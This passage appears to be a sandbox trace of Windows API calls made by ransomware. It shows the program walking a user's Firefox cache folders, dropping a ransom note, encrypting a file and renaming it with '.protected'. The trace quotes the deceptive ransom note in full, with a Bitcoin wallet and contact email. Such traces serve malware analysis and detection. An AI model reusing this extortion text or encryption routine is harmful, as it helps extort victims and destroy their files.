(lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.277] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.277] CloseHandle (hObject=0x158) returned 1 [0086.278] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.278] lstrcmpiW (lpString1="A", lpString2="Windows") returned -1 [0086.278] lstrcmpiW (lpString1="A", lpString2="Program Files") returned -1 [0086.278] lstrcmpiW (lpString1="A", lpString2="Program Files (x86)") returned -1 [0086.278] lstrcmpiW (lpString1="A", lpString2="$Recycle.bin") returned 1 [0086.278] lstrcmpiW (lpString1="A", lpString2="System Volume Information") returned -1 [0086.278] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A") returned 97 [0086.278] lstrcmpW (lpString1="A", lpString2=".") returned 1 [0086.278] lstrcmpW (lpString1="A", lpString2="..") returned 1 [0086.278] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\*") returned 99 [0086.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.278] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.278] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.278] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.278] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.278] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\.") returned 99 [0086.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.278] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.279] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.279] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.279] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.279] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.279] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.279] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\..") returned 100 [0086.279] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.279] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.279] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.279] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.279] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\RESTORE_FILES.txt") returned 115 [0086.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\a\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.279] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.279] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.280] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.280] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.280] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.280] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.280] CloseHandle (hObject=0x158) returned 1 [0086.280] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.280] lstrcmpiW (lpString1="B", lpString2="Windows") returned -1 [0086.280] lstrcmpiW (lpString1="B", lpString2="Program Files") returned -1 [0086.280] lstrcmpiW (lpString1="B", lpString2="Program Files (x86)") returned -1 [0086.280] lstrcmpiW (lpString1="B", lpString2="$Recycle.bin") returned 1 [0086.281] lstrcmpiW (lpString1="B", lpString2="System Volume Information") returned -1 [0086.281] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B") returned 97 [0086.281] lstrcmpW (lpString1="B", lpString2=".") returned 1 [0086.281] lstrcmpW (lpString1="B", lpString2="..") returned 1 [0086.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\*") returned 99 [0086.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.281] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.281] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.281] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.281] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.281] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\.") returned 99 [0086.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.281] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.281] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\..") returned 100 [0086.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.282] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.282] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\RESTORE_FILES.txt") returned 115 [0086.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.283] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.283] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.283] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.284] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.284] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.284] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.284] CloseHandle (hObject=0x158) returned 1 [0086.284] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.284] lstrcmpiW (lpString1="C", lpString2="Windows") returned -1 [0086.284] lstrcmpiW (lpString1="C", lpString2="Program Files") returned -1 [0086.284] lstrcmpiW (lpString1="C", lpString2="Program Files (x86)") returned -1 [0086.284] lstrcmpiW (lpString1="C", lpString2="$Recycle.bin") returned 1 [0086.284] lstrcmpiW (lpString1="C", lpString2="System Volume Information") returned -1 [0086.284] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C") returned 97 [0086.284] lstrcmpW (lpString1="C", lpString2=".") returned 1 [0086.284] lstrcmpW (lpString1="C", lpString2="..") returned 1 [0086.284] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\*") returned 99 [0086.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.284] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.284] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.284] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.284] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.284] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\.") returned 99 [0086.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.284] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.284] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.284] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.284] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.285] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.285] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.285] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\..") returned 100 [0086.285] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.285] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="Windows") returned -1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="Program Files") returned -1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="Program Files (x86)") returned -1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="$Recycle.bin") returned 1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="System Volume Information") returned -1 [0086.285] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6") returned 100 [0086.285] lstrcmpW (lpString1="E6", lpString2=".") returned 1 [0086.285] lstrcmpW (lpString1="E6", lpString2="..") returned 1 [0086.285] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\*") returned 102 [0086.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.286] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.286] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.286] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.286] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.286] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.286] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\.") returned 102 [0086.286] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.286] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.286] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.286] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.286] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.286] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.286] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.286] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\..") returned 103 [0086.286] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.286] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.286] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="Windows") returned -1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="Program Files") returned -1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="Program Files (x86)") returned -1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="$Recycle.bin") returned 1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="System Volume Information") returned -1 [0086.286] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0086.286] StrStrIW (lpFirst="9DCB7d01", lpSrch=".protected") returned 0x0 [0086.286] lstrcmpW (lpString1="9DCB7d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.286] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.286] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0086.287] StrStrW (lpFirst="9DCB7d01", lpSrch=".txt") returned 0x0 [0086.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0086.287] StrStrW (lpFirst="9DCB7d01", lpSrch=".rar") returned 0x0 [0086.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0086.287] StrStrW (lpFirst="9DCB7d01", lpSrch=".zip") returned 0x0 [0086.287] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.288] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.288] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.289] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.289] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.290] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.290] CloseHandle (hObject=0x160) returned 1 [0086.290] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.protected") returned 119 [0086.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01.protected")) returned 1 [0086.291] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.291] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.291] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\RESTORE_FILES.txt") returned 118 [0086.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.291] lstrlenA (lpString="! SYSTEM SECURITY ALERT 